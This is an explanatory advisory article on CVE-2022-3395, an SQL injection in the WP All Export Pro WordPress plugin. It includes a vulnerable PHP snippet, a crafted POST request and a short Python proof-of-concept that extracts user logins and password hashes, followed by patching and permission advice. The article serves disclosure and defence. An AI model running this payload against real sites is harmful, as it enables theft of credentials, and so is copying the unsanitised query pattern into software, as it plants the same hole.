CVE-2022-3395 affects the widely used WordPress plugin WP All Export Pro (versions before 1.7.9). This plugin helps WordPress website admins export site data, but a critical vulnerability lets certain users (not just admins in some configurations) run arbitrary SQL commands straight against your site’s database. That means this SQL Injection flaw could let an attacker steal, modify, or destroy information in your database.

Here’s a close-up, easy-to-follow explanation of the bug, including how it works, how someone might exploit it, and steps to secure your website.

What’s the Vulnerability?

WP All Export Pro allows permitted users to run exports. But, it wrongly trusts everything it gets from the cc_sql POST parameter — sending it straight into the database without cleaning it first.

If a user with export permissions sends a crafted cc_sql value, they can run any SQL command they choose.  
By default, only administrators can export, but these permissions are often changed, meaning editors and other users could exploit this too.

Let’s look at a simplified version of what’s happening inside the plugin

// Example snippet of vulnerable code:

if (isset($_POST['cc_sql'])) {
    $query = $_POST['cc_sql'];
    $results = $wpdb->get_results($query);
}

With this code, whatever goes into $_POST['cc_sql'] gets executed as an SQL query. No checks. No escaping.

Proof of Concept: How Could an Attacker Exploit This?

Let’s say an attacker is a lower-privileged user with access to exports. They send this specially crafted POST request:

POST /wp-admin/admin-ajax.php?action=pmxe_run_export HTTP/1.1
Host: target.example.com
Cookie: [session]
Content-Type: application/x-www-form-urlencoded

cc_sql=SELECT user_login, user_pass FROM wp_users

This query would return the usernames and hashed passwords of everyone on the site.

An attacker can run any SQL they want—including DROP TABLE, creating new admin accounts, or stealing private data.

Quick Demo Exploit Script (for Testing Only!)

⚠️ Never run this against a site you don’t own!

import requests

url = "https://target.example.com/wp-admin/admin-ajax.php";
cookie = {"wordpress_logged_in_sess": "SESSION_TOKEN"} # must be a user with export permissions

payload = {
    "action": "pmxe_run_export",
    "cc_sql": "SELECT user_login, user_pass FROM wp_users"
}

response = requests.post(url, cookies=cookie, data=payload)
print(response.text)

All WordPress sites running WP All Export Pro before 1.7.9.

- Even non-admin users could exploit this if export permissions are delegated (which is common in multi-author sites).

Mitigation: How to Protect Your Site

1. Update WP All Export Pro to 1.7.9 or later!  
The developers patched this vulnerability quickly. Get the latest version here:  
WP All Export Pro – Official Site

2. Review user permissions.  
Make sure only trusted administrators can run exports.

3. Monitor for strange activity.  
Check your logs for unusually crafted export requests, especially those containing SQL syntax.

How Was This Found? References

- WPScan Advisory CVE-2022-3395
- NVD – National Vulnerability Database CVE-2022-3395
- Patch Release Changelog (WP All Export)

Summary

CVE-2022-3395 in WP All Export Pro is a prime example of why user input should never be sent blindly to your database. While only admin-level users can exploit it out of the box, real-world sites often share these powers with non-admins — opening the door for privilege escalation, data theft, or a complete site compromise.

Update now.  
Check your site’s user roles.  
Rest easy knowing your WordPress site is safe from this powerful SQL Injection bug.


🛑 Stay safe: keep up with plugin updates and double-check user permissions on your critical WordPress installs!

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 15:11:00 UTC